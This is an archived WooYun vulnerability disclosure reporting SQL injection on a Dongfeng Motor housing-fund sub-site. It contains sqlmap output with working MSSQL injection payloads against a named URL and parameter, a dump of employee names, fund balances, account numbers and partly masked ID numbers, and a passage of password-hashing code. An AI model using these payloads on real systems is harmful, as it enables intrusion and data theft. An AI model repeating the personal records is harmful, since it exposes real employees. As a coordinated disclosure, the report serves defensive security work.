Vulnerability summary

Defect ID: wooyun-2015-0124628

Title: SQL injection on a Dongfeng Motor Corporation sub-site (leaks 60,000+ employee names, national ID numbers, housing provident fund account numbers, fund balances, etc.)

Vendor: 东风汽车公司 (Dongfeng Motor Corporation)

Author: Ysql404

Submitted: 2015-07-05 11:31

Fixed: 2015-08-23 16:16

Published: 2015-08-23 16:16

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-07-05: details sent to the vendor, awaiting vendor handling
2015-07-09: vendor confirmed; details visible to the vendor only
2015-07-19: details opened to core white hats and domain experts
2015-07-29: details opened to regular white hats
2015-08-08: details opened to intern white hats
2015-08-23: details opened to the public

Brief description:

Dongfeng Motor Corporation was founded in 1969 and is a backbone enterprise of the Chinese automotive industry. Over more than thirty years it has built its main production bases in Shiyan (mainly medium and heavy commercial vehicles, parts and automotive equipment), Xiangfan (mainly light commercial vehicles and passenger cars), Wuhan (mainly passenger cars) and Guangzhou (mainly passenger cars); the operations centre moved from Shiyan to Wuhan on 2003-09-28. Its core business covers the full range of commercial vehicles, passenger cars, automotive parts and automotive equipment, with vehicle output now split roughly evenly between commercial vehicles and passenger cars. At the end of 2004 the company had total assets of RMB 76.89 billion, net assets of RMB 33.9 billion and 106,000 registered employees.

Detailed description:

SQL injection on a Dongfeng Motor Corporation sub-site (leaks 60,000+ employee names, national ID numbers, provident fund balances, etc.); back-end administrator passwords are stored in plaintext.
Injection point: http://www.dfgjj.dfmc.com.cn/ShowNews.aspx?Id=2345, parameter: Id

GET parameter 'Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=2345 AND 8776=8776
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: Id=2345 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(104)+CHAR(113)+CHAR(103)+CHAR(113)+CHAR(100)+CHAR(71)+CHAR(109)+CHAR(65)+CHAR(71)+CHAR(104)+CHAR(67)+CHAR(68)+CHAR(83)+CHAR(79)+CHAR(113)+CHAR(99)+CHAR(118)+CHAR(112)+CHAR(113),NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Id=2345; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Id=2345 WAITFOR DELAY '0:0:5'--
---
[10:12:49] [INFO] testing Microsoft SQL Server
[10:12:49] [INFO] confirming Microsoft SQL Server
[10:12:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[10:12:50] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.dfgjj.dfmc.com.cn'


available databases [12]:
[*] BANKDB
[*] CenterNew
[*] CenterXF
[*] distribution
[*] DKDBSY
[*] DKDBXY
[*] GJJWEB
[*] master
[*] model
[*] msdb
[*] sybx
[*] tempdb


The GJJCX (provident fund lookup) table holds more than 60,000 rows:

Database: GJJWEB
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.GJJCX   | 60799   |
| dbo.article | 152     |
| dbo.address | 56      |
| dbo.gjjuser | 2       |
| dbo.dkll    | 1       |
+-------------+---------+


Column legend (per the report): YE = balance, ZH = account number, SFZ = national ID number; XH, RQ and XM appear to be sequence number, period (YYYYMM) and name. ID numbers were masked by the author before posting.

Database: GJJWEB
Table: GJJCX
+-----------+--------+---------+-----------+-----------+--------------------+
| XH | RQ | XM | YE | ZH | SFZ |
+-----------+--------+---------+-----------+-----------+--------------------+
| 154832076 | 201504 | 孙斌 | 75287.32 | 020100132 | 42030019570825**** |
| 154832077 | 201504 | 吴爱华 | 65713.77 | 020100135 | 42030019671106**** |
| 154832078 | 201504 | 程圣炎 | 6168.21 | 020100138 | 42030019650910**** |
| 154832079 | 201504 | 张利红 | 50966.85 | 020100145 | 42030019760707**** |
| 154832080 | 201504 | 黄静 | 63911.33 | 020100150 | 42030019681107**** |
| 154832081 | 201504 | 刘之顺 | 139101.51 | 020100157 | 42030019630916**** |
| 154832082 | 201504 | 刘远泽 | 46135.70 | 020100162 | 42030019620203**** |
| 154832083 | 201504 | 余咏梅 | 22998.69 | 020100165 | 42030319720420**** |
| 154832084 | 201504 | 张红英 | 126249.82 | 020100168 | 42030019670515**** |
| 154832085 | 201504 | 马朝阳 | 147861.24 | 020100177 | 42030019630504**** |
| 154832086 | 201504 | 王春萍 | 62105.92 | 020100182 | 42030019680322**** |
| 154832087 | 201504 | 王韬 | 58395.98 | 020100186 | 42010619671013**** |
| 154832088 | 201504 | 杨小莉 | 72198.16 | 020100187 | 42030019650416**** |
| 154832089 | 201504 | 任桂梅 | 62851.21 | 020100188 | 42030019690510**** |
| 154832090 | 201504 | 程勇 | 16843.02 | 020100191 | 42030019710806**** |
| 154832091 | 201504 | 陈立 | 3208.12 | 020100192 | 42030067091**** |
| 154832092 | 201504 | 于凯 | 14159.32 | 020100197 | 42030019700405**** |
| 154832093 | 201504 | 胥刘继 | 115226.03 | 020100198 | 42030019620802**** |
| 154832094 | 201504 | 王浩 | 69741.11 | 020100201 | 42030019750820**** |
| 154832095 | 201504 | 曾守辉 | 49091.67 | 020100202 | 42030019720827**** |
| 154832096 | 201504 | 杨杰伟 | 16172.10 | 020100210 | 42030019730105**** |
| 154832097 | 201504 | 李斌 | 65742.55 | 020100211 | 420300196703122*** |
| 154832098 | 201504 | 周启霞 | 49977.52 | 020100212 | 42030019751211**** |
| 154832099 | 201504 | 雷涛 | 50668.03 | 020100214 | 420300196602262**** |


The site itself exposes a lookup function for this data:

[screenshot: QQ图片20150705105623.png]


Back-end administrator passwords are stored in plaintext:

[screenshot: QQ图片20150705110002.png]
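A plaintext `gjjuser` table turns an injection like the one above into an immediate administrator login; stored as salted, iterated hashes the same dump yields nothing directly usable. The block below is an added example (not the site's code and not from the original report) of the storage scheme a practitioner would expect in its place: PBKDF2-HMAC-SHA256 with a random per-user salt, a constant-time verify, and a login path that upgrades legacy plaintext rows on the user's next successful login. The `pbkdf2_sha256$iterations$salt$hash` string layout, the iteration count and the in-memory `users` store are assumptions made for this example.

```python
import base64
import hashlib
import hmac
import os

# Assumed storage format (not from the page): one string per user row,
#   pbkdf2_sha256$<iterations>$<salt base64>$<derived key base64>
# so the work factor can be raised later without breaking existing rows.
ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000          # current OWASP guidance for PBKDF2-HMAC-SHA256


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Derive a salted PBKDF2 hash.  A fresh 16-byte salt per password means
    two users with the same password get different stored values."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([ALGORITHM, str(iterations),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(dk).decode("ascii")])


def is_hashed(stored: str) -> bool:
    """Distinguish a hashed row from a legacy plaintext row."""
    return stored.startswith(ALGORITHM + "$")


def verify_password(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored hash.
    Returns False (never raises) for plaintext or malformed stored values."""
    try:
        algorithm, iterations, salt_b64, dk_b64 = stored.split("$")
        if algorithm != ALGORITHM:
            return False
        salt = base64.b64decode(salt_b64, validate=True)     # binascii.Error is a ValueError
        expected = base64.b64decode(dk_b64, validate=True)
        iterations = int(iterations)
    except ValueError:
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(dk, expected)


def needs_rehash(stored: str, iterations: int = ITERATIONS) -> bool:
    """True for legacy plaintext rows or hashes below the current work factor."""
    if not is_hashed(stored):
        return True
    try:
        return int(stored.split("$")[1]) < iterations
    except (IndexError, ValueError):
        return True


def login(username: str, password: str, users: dict) -> bool:
    """Authenticate against an in-memory user store (constructed stand-in for
    the gjjuser table) that may still hold plaintext rows.  A legacy row is
    compared directly exactly once, then replaced by a hash."""
    stored = users.get(username)
    if stored is None:
        return False
    if is_hashed(stored):
        ok = verify_password(password, stored)
    else:                                                  # legacy plaintext row
        ok = hmac.compare_digest(stored.encode("utf-8"), password.encode("utf-8"))
    if ok and needs_rehash(stored):
        users[username] = hash_password(password)          # upgrade in place
    return ok


if __name__ == "__main__":
    users = {"admin": "S3cret!"}                           # constructed sample row
    print(login("admin", "S3cret!", users), users["admin"][:30], "...")
```

The migration path matters as much as the hash: a one-off script cannot hash passwords it no longer knows, so the rewrite happens at login, and until every row has been upgraded the plaintext column should be treated as compromised and a forced reset scheduled for rows that never log in.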


Proof of vulnerability:

(The proof section repeats the sqlmap output, database list, table dump and screenshots already given in the detailed description above.)


Remediation:

The data pulled during testing has been deleted; the database was not dumped!

Copyright notice: please credit Ysql404@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 11

Confirmed: 2015-07-09 16:15

Vendor reply:

CNVD has confirmed the reported vulnerability; no direct handling channel with the unit that administers the site has been established yet, awaiting claim.

Latest status:

None